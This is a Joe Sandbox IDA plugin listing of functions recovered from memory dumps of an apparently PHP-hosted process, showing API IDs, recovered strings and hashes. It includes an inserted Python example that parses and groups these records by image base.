                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$AdjustPointer
                                                • String ID:
                                                • API String ID: 1501936508-0
                                                • Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                • Instruction ID: d3ff09a3401612fad7d4e6f73e8668af2596c25b7395d74f60401984b4e0e494
                                                • Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                • Instruction Fuzzy Hash: AD519E26B0EF42C1EA658F93944467C63A6AF46FE0B0984F7DA4D06BA4DF7CE4428310
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                 • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __intrinsic_setjmp_efree@@8virtual_chdirvirtual_getcwdzend_destroy_file_handlezend_execute_scriptszend_stream_init_filenamezval_ptr_dtor
                                                • String ID:
                                                • API String ID: 4082177501-0
                                                • Opcode ID: 9886735fd19537ddcc64757c30396f091716d4bdd422e183795669e6344f89ca
                                                • Instruction ID: 35ba34a1cc1831483321df346db4e804a43572638407ba27d2fe8b4930bd8d10
                                                • Opcode Fuzzy Hash: 9886735fd19537ddcc64757c30396f091716d4bdd422e183795669e6344f89ca
                                                • Instruction Fuzzy Hash: 67413C36608B85D9EB21FF29D8502E977B4FB58B88F848032DA4E47758DF38E559C710
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader_local_unwind
                                                • String ID: MOC$RCC$csm$csm
                                                • API String ID: 2627209546-1441736206
                                                • Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                • Instruction ID: d45995bf7c5bd6b8427faeb890c8fa61775ecc677fad3825a394def6521a80df
                                                • Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                • Instruction Fuzzy Hash: 67517FB2B4DA42C6EB609BA6904137D26A2FF46FB8F1410F3DA4E566A5CF3CE445C601
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: {for
                                                • API String ID: 2943138195-864106941
                                                • Opcode ID: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
                                                • Instruction ID: 0b0e24e90d08d12f7cb0697a31e1a35e092360b5fb7136d3962f28436eb117ef
                                                • Opcode Fuzzy Hash: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
                                                • Instruction Fuzzy Hash: 635156B2B0CA85A9E7018F66D4813F827A2EB56B58F4080F7EA4C07BA5DF7CE554C340
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                 • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8zend_hash_index_del@@16
                                                • String ID: %s Closed without sending a request; it was probably just an unused speculative preconnection$%s Closing$%s Invalid request (%s)$Unexpected EOF
                                                • API String ID: 126594957-4231326387
                                                • Opcode ID: f196a74f18a23b67ecf4fefdc62fade8b532747b7616117ed819e3a6f1bdf7ca
                                                • Instruction ID: 9c1d602a20083ef85d2b062f3c225f11b2bcd1f592bc8cef0a3593515795fb95
                                                • Opcode Fuzzy Hash: f196a74f18a23b67ecf4fefdc62fade8b532747b7616117ed819e3a6f1bdf7ca
                                                • Instruction Fuzzy Hash: 1241C122B1CB82C2EB14BF5EE4441BAA379FB84784F844176DB5E47B89DF2DE4618310
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::atol
                                                • String ID: `template-parameter$void
                                                • API String ID: 2130343216-4057429177
                                                • Opcode ID: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
                                                • Instruction ID: 2989450db3bab62e3afa006d288646c10c80a3f7c6e8fdcf1cdee310f5e2a8ae
                                                • Opcode Fuzzy Hash: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
                                                • Instruction Fuzzy Hash: 43412922B0CF56C8FB008BA2D8512BD2371BF85BA8F5441B7DE0D67A65DF789545C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+Replicator::operator[]
                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                • API String ID: 1405650943-2211150622
                                                • Opcode ID: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
                                                • Instruction ID: 1cf0cf310469407692c57d83767f517bac0008860358f6d8c1fbfddfacc6a94d
                                                • Opcode Fuzzy Hash: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
                                                • Instruction Fuzzy Hash: 08413AA2B0CF46C8F7128BA6D8402BC37A1BB4AB68F4445F7EA4C12764DF7CA545C311
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: char $int $long $short $unsigned
                                                • API String ID: 2943138195-3894466517
                                                • Opcode ID: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
                                                • Instruction ID: 1dcc1fcff546022d7cfc947553c0085dce3abedaba59e326475b69d91a8a5795
                                                • Opcode Fuzzy Hash: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
                                                • Instruction Fuzzy Hash: 81313B62F1CE46C8F7018B6AD8543BC27B1BB46B68F5881B7CA0C02AA8DF3CA544C750
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                 • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: Buffer not contiguous$Not available on this OS$Not initialized correctly$Success$Unknown error code$Windows error code: %lu
                                                • API String ID: 1452528299-4100623288
                                                • Opcode ID: 81c357af6c1408623f29115be5d9cad58a7809e2a75961b1e48677b4cf867a2f
                                                • Instruction ID: 621862ee421575b36c986e17bd28e8d476c5d00890338f32cbfba98d23efcf91
                                                • Opcode Fuzzy Hash: 81c357af6c1408623f29115be5d9cad58a7809e2a75961b1e48677b4cf867a2f
                                                • Instruction Fuzzy Hash: D7F0E779E4DA02D9EA587F1D98A50B4963CBFC5308FC4027AC21D02A75DE1CF6BAC724
                                                APIs
                                                • zend_strndup@@16.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6D74,?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6B66
                                                • php_raw_url_decode.PHP8TS(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6B88
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6BDE
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6C79
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6CB9
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6CEF
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                 • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                 • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: memmove$php_raw_url_decodezend_strndup@@16
                                                • String ID:
                                                • API String ID: 3041052580-0
                                                • Opcode ID: 1f84f3afe3a0470136ba4bb7014c1384d7f273fa477e0fbb74a8c1c596acbfb0
                                                • Instruction ID: d7e417346df807f1e39253a8ff31f9b58f025d9981d142b08c70fd3cf304d95c
                                                • Opcode Fuzzy Hash: 1f84f3afe3a0470136ba4bb7014c1384d7f273fa477e0fbb74a8c1c596acbfb0
                                                • Instruction Fuzzy Hash: 0A51B251A0D7DB85FE217E29D60C278E6B9EB15FD1F988430CA4D07B86CF7DA4628321
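The record above is one of the few in this listing that carries resolved call sites (module and address) as well as the similarity fields every record has. The Python below is an added example, not code from Joe Sandbox or from this report: it parses records in this layout into structured data, groups the recovered functions by image base and searches their string lists, which is the quickest way to separate the functions in the 7FF7498C0000 image from those in the 7FFE1A520000 image when reading a dump this long. The sample text is constructed in the shape of the records on this page. Reading the first two dot-separated fields of the .sdmp name as the hex process id and run number is an inference from the fact that they agree with the hcaresult_24_2_... snapshot names here; the report does not document that layout.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs" / "Memory Dump Source" /
"Similarity" blocks) into structured data. Added example, not Joe Sandbox code.
Assumed: a record starts at a line reading exactly "APIs"; the first two fields
of the .sdmp name are the hex pid and run number (they agree with the
hcaresult_<pid>_<run>_ snapshot names here, but that mapping is inferred);
entries of the String ID list are separated by '$'."""
import re
from collections import defaultdict

# Resolved call site: "• memmove.VCRUNTIME140(?,?), ref: 00007FF7498C6BDE"
API_CALL = re.compile(r"^• (?P<name>[^.(]+)\.(?P<module>\w+)\([^)]*\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Generic "• Key: value" line; the value may be empty ("• String ID:")
FIELD = re.compile(r"^• (?P<key>[^:]+):\s*(?P<value>.*)$")
# "<pid>.<run>.<id>.<regionstart>.<...>.sdmp, Offset: <base>, based on PE: true"
SOURCE = re.compile(r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.\d+\.(?P<start>[0-9A-Fa-f]{16})"
                    r"\..*\.sdmp, Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

# Constructed sample in the report's layout: two records at base 7FF7498C0000, one at 7FFE1A520000.
SAMPLE = """\
APIs
• zend_strndup@@16.PHP8TS(?,0000000100000001), ref: 00007FF7498C6B66
• php_raw_url_decode.PHP8TS(?,?), ref: 00007FF7498C6B88
• memmove.VCRUNTIME140(?,?), ref: 00007FF7498C6BDE
Memory Dump Source
• Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
• Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
Similarity
• API ID: memmove$php_raw_url_decodezend_strndup@@16
• String ID:
• Instruction ID: d7e417346df807f1e39253a8ff31f9b58f025d9981d142b08c70fd3cf304d95c
APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
Similarity
• API ID: _efree@@8zend_hash_index_del@@16
• String ID: %s Closed without sending a request; it was probably just an unused speculative preconnection$%s Closing$%s Invalid request (%s)$Unexpected EOF
• Instruction ID: 9c1d602a20083ef85d2b062f3c225f11b2bcd1f592bc8cef0a3593515795fb95
APIs
Memory Dump Source
• Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
Similarity
• API ID: abort$AdjustPointer
• String ID:
• Instruction ID: 241caae712970f75e3c1c9cd5adc62efc0acb62da631b1025390f39233bbd73c
"""


def parse_records(text):
    """Split the text into records (one per 'APIs' header) and decode their fields."""
    raw, rec = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            rec = {"calls": [], "fields": {}, "associated": []}
            raw.append(rec)
        elif rec is None or not line:
            continue
        elif (m := API_CALL.match(line)):
            rec["calls"].append({"name": m["name"], "module": m["module"], "ref": int(m["ref"], 16)})
        elif (m := FIELD.match(line)):
            if m["key"] == "Associated":        # repeated key: keep every region
                rec["associated"].append(m["value"])
            else:
                rec["fields"][m["key"]] = m["value"]
    return [_decode(r) for r in raw]


def _decode(rec):
    f = rec["fields"]
    src = SOURCE.match(f.get("Source File", ""))
    strings = f.get("String ID", "")
    hexint = lambda g: int(src[g], 16) if src else None
    return {"pid": hexint("pid"), "run": hexint("run"), "region_start": hexint("start"),
            "base": hexint("base"), "is_pe": bool(src and src["pe"] == "true"),
            "snapshot": f.get("Snapshot File", ""), "api_id": f.get("API ID", ""),
            "strings": strings.split("$") if strings else [],
            "instruction_id": f.get("Instruction ID", ""),
            "calls": rec["calls"], "associated": rec["associated"]}


def group_by_base(records):
    """Image base -> records, so functions of different mapped images can be told apart."""
    groups = defaultdict(list)
    for r in records:
        groups[r["base"]].append(r)
    return dict(groups)


def imported_modules(records):
    """Image base -> sorted list of modules named at resolved call sites."""
    mods = defaultdict(set)
    for r in records:
        for c in r["calls"]:
            mods[r["base"]].add(c["module"])
    return {b: sorted(m) for b, m in mods.items()}


def find_strings(records, pattern):
    """(base, instruction id, string) for every recovered string matching the regex."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [(r["base"], r["instruction_id"], s) for r in records for s in r["strings"] if rx.search(s)]
```

Feed it the text of the whole function listing (copied out of the report) instead of SAMPLE and `find_strings(records, r"request|socket|listen")` lands on the functions worth opening first, while `group_by_base` shows how many records belong to each mapped image.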
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                • String ID:
                                                • API String ID: 3741236498-0
                                                • Opcode ID: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
                                                • Instruction ID: b7e9943dd18dce4e02c9b1b47a4fbf3beeffe7fbccfae958ed13b44c01cd3b02
                                                • Opcode Fuzzy Hash: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
                                                • Instruction Fuzzy Hash: 6431A122B1DB9180EA118B66A80457923A5FF4AFE4F5946B3DE2D037A0EE3DE442C350
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 2889003569-2084237596
                                                • Opcode ID: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
                                                • Instruction ID: e4c58c50d9da9494374e432403a4b4f1002112c543465b739f2966fff10d8f3d
                                                • Opcode Fuzzy Hash: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
                                                • Instruction Fuzzy Hash: 8A915173B08B91CAE7108BA6E4402BD77B2FB45BA8F1441A7EA4D17765DF38D195CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                • API String ID: 2943138195-757766384
                                                • Opcode ID: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
                                                • Instruction ID: b4c99bdb4f7ebec0067521fdc6a5edbcdfb0de8cfc15ef3ebd6dc14d00f801f3
                                                • Opcode Fuzzy Hash: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
                                                • Instruction Fuzzy Hash: A4715A62B0CE42C4E7148FA699410BC66A2BF46BA4F4445F7DA4D53ABADF3CE650C340
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                 • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                 • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 2889003569-2084237596
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::$Name::operator+
                                                • String ID:
                                                • API String ID: 826178784-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8_emalloc@@8add_assoc_stringl_exmemmovestrchr
                                                • String ID:
                                                • API String ID: 2071373115-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$ferrorfwritephp_handle_aborted_connection
                                                • String ID:
                                                • API String ID: 912128676-0
                                                APIs
                                                • zend_string_tolower_ex@@16.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F31
                                                • zend_hash_add@@24.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F49
                                                • zend_hash_add@@24.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F5F
                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F73
                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F88
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: freezend_hash_add@@24$zend_string_tolower_ex@@16
                                                • String ID:
                                                • API String ID: 2958139939-0
                                                APIs
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A524407
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmp
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmp
